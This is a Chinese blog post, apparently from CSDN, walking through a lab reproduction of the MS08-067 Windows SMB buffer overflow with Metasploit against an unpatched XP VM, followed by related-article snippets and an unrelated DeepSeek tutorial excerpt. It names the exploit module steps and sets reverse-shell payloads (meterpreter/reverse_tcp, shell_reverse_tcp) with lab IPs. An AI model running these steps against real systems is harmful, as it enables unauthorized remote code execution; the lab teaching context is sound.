ms08-067漏洞复现

最新推荐文章于 2025-03-19 14:00:00 发布
最新推荐文章于 2025-03-19 14:00:00 发布
阅读量5.6k 收藏 19
点赞数 3
分类专栏: # metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43901998/article/details/108490618
版权

文章目录

ms08-067简介

Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)。

  • 漏洞类别:远程溢出
  • CVE-ID : 2008-4250

漏洞详情:

MicrosoftWindows是美国微软(Microsoft)公司发布的一系列操作系统。Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。对于Windows2000、XP和Server2003,无需认证便可以利用这个漏洞;对于WindowsVista和Server2008,可能需要进行认证。

参考链接:
Windows Server服务 RPC请求缓冲区溢出漏洞
Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)

复现

实验环境

未打补丁的xp:192.168.43.199
kali:192.168.43.185
两台主机之间可以通信。

漏洞利用

首先进入msfconsole,寻找ms08-067相关的攻击模块。
在这里插入图片描述
这里只有一个可用的exploit模块,use它。
在这里插入图片描述
然后show targets查看一下,该模块都适用于哪些windows版本。
在这里插入图片描述
本次实验的主机是xp3 simplified。
这里将目标主机的类型设置。
在这里插入图片描述
然后看一下需要配置哪些参数show options
在这里插入图片描述
这里设置一下rhosts即可。
在这里插入图片描述
然后查看一下有哪些可用的payload;show payloads
在这里插入图片描述
这里选择44号。set pyaload windows/meterpreter/reverse_tcp
在这里插入图片描述
然后再看一下payload需要配置哪些参数show options
在这里插入图片描述
需要配置lohostlport;配置监听地址和监听端口。监听端口有默认值,这里就只配置监听地址为kali的IP。
在这里插入图片描述
然后开始渗透
在这里插入图片描述
如图所示渗透成功。

未解决:
进入cmd后,存在乱码问题。
在这里插入图片描述

MS08-067 (CVE-2008-4250) 远程命令执行漏洞
李火火的安全圈
03-18 1万+
文章目录前言一、漏洞简介二、影响范围三、漏洞危害四、本地复现五、补丁编号六、 Windows Server 2003 SP2 中文版利用方法七、漏洞原理深度剖析 前言 本文为08年出现的漏洞进行复现,仅作为学习参考,切勿非法利用! 一、漏洞简介 MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize 函数时触发的,而NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,
Kali之MSF的MS08-067漏洞复现详解
weixin_47899104的博客
12-05 7801
MSF即Metasploit Framework,是一个综合性的渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。 目前安装的kali都自带MSF,可以直接在图形界面打开 也可以在kali的终端通过使用命令msfconsole来打开。 ┌──(kali㉿kali)-[~] └─$ ls /usr/share/metasploit-framework/ 或者2022版kali以后(在这之前的版本不知道可不可行)的直接桌面按如下步骤找到msf安装目录。 ①auxiliary模块:主要包含渗透测
ms08-067调研加完全复现
08-25
对windows的2008年的经典漏洞ms08-067进行了复现,每一步我都给出了配图,适合新手学习和使用。原创者:x
Metasploit的一次尝试ms08_067
Culprit的博客
01-24 909
实验准备:1.VM虚拟机中Linux Kali攻击机、没有打过补丁的xp系统(同时关闭防火墙)、   kali IP:192.168.19.137   xp IP:192.168.19.144   在进行漏洞渗透攻击之前先确定两者是否在同一网段,   xp打开命令框输入:xp中输入ipconfig   kali中输入:ifconfig   可以看到二者在
网络服务器攻击渗透MS08-067
最新发布
weixin_47114294的博客
03-19 288
影响协议:Server 服务(通过 SMB 协议处理 RPC 请求)漏洞类型:缓冲区溢出漏洞(远程未认证利用)危害等级:高危(CVSS 3.0 评分 10.0)Windows XP(SP0-SP3,未打补丁)Windows Server 2003(SP0-SP2,未打补丁)Windows Vista(部分版本)Windows Server 2008(部分版本)注意:Windows 7 及更高版本默认不受影响,但需注意旧版企业环境中可能仍存在未升级的系统。
ms08-067溢出工具
10-27
ms08067 利用工具 ms08 067溢出工具 ms08-067漏洞
MS08-067漏洞复现实验
0day
06-18 1616
MS08-067漏洞复现实验 实现环境准备: 攻击机:kali(IP:192.168.153.129) 目标靶机:Windows XP(IP:192.168.153.128) 攻击工具:metasploit-framework,nmap 实验步骤 第一步:使用nmap扫描目标靶机,判断其是否存在ms08-067漏洞 nmap -n -p 445 --script smb-vuln-ms08-067 192.168.153.128 --open 扫描发现该目标靶机存在该漏洞,具备实验条件 第二步:打开met
MS08-067溢出漏洞详解
Mashuwei
12-15 2563
利用远程溢出漏洞进行攻击是一种非常有效而且威力巨大的黑客攻击手段。微软Windows系统已经有一年多没有爆出远程溢出漏洞了,微软爆出四年以来最严重的特大安全漏洞——MS08-067远程溢出漏洞,几乎影响所有Windows系统,并且很快成为黑客攻击和木马传播利用的手段,受此漏洞危害的用户系统非常之多! 一、MS08-067远程溢出漏洞简介曾经的冲击波、震荡波等大规模攻击都是由于Windo
MS08-067漏洞复现
一个未完成的故事
08-02 3546
漏洞简介: MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。(来自百度百科) 危害: 黑客可以利用该漏洞向网络中的电脑发出远程的特制RPC请求,无需身份验证便可在电脑中任意执行远程代码。这就是说,即便你的电脑设置了管理员密码,也只能任由黑客摆布。(
ms08-067 复现
Z_l123的博客
03-09 221
进入meterpreter msfconsole 进入ms08-067模块,并使用 search ms08-067 use 0 设置攻击地址,本机地址,payload set rhosts 192.168.254.133 (目标ip) set lhost 192.168.254.129 (本机ip) set payload generic/shell_reverse_tcp 查看 show options 开始攻击 run ...
缓冲区溢出MS08-067漏洞复现
qq_51331767的博客
11-09 524
MS08-067漏洞全称是“Windows Server 服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。当用户在受影响的系统上受到RPC请求时,该漏洞会允许远程代码执行,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。同时,该漏洞可以用于蠕虫攻击。
Windows漏洞MS08-067远程代码执行漏洞复现及深度防御
华为云官方博客
11-16 9514
摘要:详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程
MS08-067 漏洞利用与安全加固
theRavensea
03-15 2587
攻击者利用受害者主机默认开发的SMB服务的端口445 发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成可被利用并可远程执行代码。MS08_067 漏洞的全程为 “WIndows Server 服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求。则该漏洞可能允许远程执行代码。 Ms08_067_netapi 是Metasploit 中的一款溢出攻击载荷。NetPathCanonicalize 函数在远程访问其他主机时会调用 NetpwCanoni
MS08-067
weixin_30485799的博客
06-20 253
简单介绍一下漏洞 ms08-067 编辑 讨论 MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。 中文名 ms08-067 外文名 ...
北大deepseek教程
03-02
### 关于北京大学 DeepSeek 教程 北京大学的人工智能学院和计算机学院联合发布了详细的 DeepSeek 教程,这份文档不仅涵盖了 DeepSeek 的基础概念及其应用实例,而且特别强调了 AI 时代下工作模式与所需技能的重大转变[^1]。 对于希望了解如何利用这一先进工具来提升工作效率和个人能力的人来说,该教程提供了一个无需深厚 AI 或大型模型背景即可理解的学习路径[^2]。通过具体案例分析以及实践指导,读者可以逐步掌握 DeepSeek 的核心功能并应用于实际场景中。 #### 获取方式 为了方便大家获取这份宝贵的资源,官方提供了网盘下载链接:[点击这里](https://pan.quark.cn/s/765a0a6e2b2f),建议有兴趣的朋友尽快保存下来以便随时查阅学习[^3]。 ```python import requests def download_file(url, local_filename=None): """ 下载指定URL的文件到本地,默认使用原名保存。 参数: url (str): 文件所在的网络地址。 local_filename (str, optional): 指定要保存为的名字,默认为空即保持原有名称。 返回值: str: 如果成功则返回完整的文件路径;如果失败,则抛出异常。 """ if not local_filename: local_filename = url.split('/')[-1] with requests.get(url, stream=True) as r: r.raise_for_status() with open(local_filename, 'wb') as f: for chunk in r.iter_content(chunk_size=8192): f.write(chunk) return local_filename ``` 此段 Python 代码展示了如何编写一个简单的函数用于从给定 URL 地址下载文件至本地存储设备上,适用于想要自动化处理此类任务的技术爱好者们。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值